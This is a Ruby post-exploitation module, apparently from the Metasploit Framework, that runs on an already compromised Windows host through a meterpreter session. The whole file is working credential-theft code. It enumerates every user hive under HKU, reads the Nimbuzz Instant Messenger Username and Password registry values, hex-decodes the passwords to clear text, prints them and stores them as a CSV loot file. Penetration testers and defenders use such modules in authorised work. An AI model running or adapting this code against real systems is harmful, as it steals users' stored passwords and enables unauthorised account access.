Path: blob/master/modules/post/windows/gather/credentials/nimbuzz.rb
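##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that reads the Nimbuzz Instant Messenger account values stored
# under each loaded user hive and records the recovered username/password
# pairs as loot.
#
# Registry locations read, per user SID under HKU (useful as audit points):
#   HKU\<SID>\Software\Nimbuzz\                         (subkey enumeration)
#   HKU\<SID>\Software\Nimbuzz\PCClient\Application\    (values Username, Password)
#
# The decoding step below is a plain hex-to-bytes conversion; no key material
# is involved in this code.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Registry
  include Msf::Auxiliary::Report

  # Registers the module metadata with the framework.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Nimbuzz Instant Messenger Password Extractor',
        'Description' => %q{
          This module extracts the account passwords saved by Nimbuzz Instant
          Messenger in hex format.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'sil3ntdre4m <sil3ntdre4m[at]gmail.com>',
          'Unknown', # SecurityXploded Team, www.SecurityXploded.com
        ],
        'Platform' => [ 'win' ],
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )
  end

  # Walks the user hives under HKU, decodes any stored Nimbuzz password and
  # saves the collected rows as a CSV loot entry.
  #
  # @return [void]
  def run
    creds = Rex::Text::Table.new(
      'Header' => 'Nimbuzz Instant Messenger Credentials',
      'Indent' => 1,
      'Columns' => ['User', 'Password']
    )

    # registry_enumkeys is treated as nil-able further down, so guard the
    # top-level enumeration the same way instead of calling #each on nil.
    (registry_enumkeys('HKU') || []).each do |k|
      # Only per-user hives (S-1-5-21-...) are of interest; the matching
      # "_Classes" hives are skipped.
      next unless k.include?('S-1-5-21')
      next if k.include?('_Classes')

      vprint_status("Looking at Key #{k}")
      subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\")

      # An empty result (Array or String) means there is nothing to read.
      if subkeys.nil? || subkeys.empty?
        print_status('Nimbuzz Instant Messenger not installed for this user.')
        next
      end

      app_key = "HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\"
      user = registry_getvaldata(app_key, 'Username') || ''
      hpass = registry_getvaldata(app_key, 'Password')

      next if hpass.nil? || (hpass == '')

      # The value is expected to carry an 11-character prefix and one trailing
      # character around the hex digits. A shorter or non-string value would
      # previously hand nil to Array#pack and abort the whole run.
      match = hpass.to_s.match(/.{11}(.*)./)
      unless match
        vprint_error("Unexpected Password value format under #{k}, skipping")
        next
      end

      decpass = [match[1]].pack('H*')
      print_good("User=#{user}, Password=#{decpass}")
      creds << [user, decpass]
    end

    # Do not create an empty loot entry when nothing was recovered.
    if creds.rows.empty?
      print_status('No Nimbuzz credentials found.')
      return
    end

    # The CSV written here contains the decoded passwords in clear text;
    # handle the resulting loot file accordingly.
    print_status('Storing data...')
    path = store_loot(
      'nimbuzz.user.creds',
      'text/csv',
      session,
      creds.to_csv,
      'nimbuzz_user_creds.csv',
      'Nimbuzz User Credentials'
    )
    print_good("Nimbuzz user credentials saved in: #{path}")
  end
end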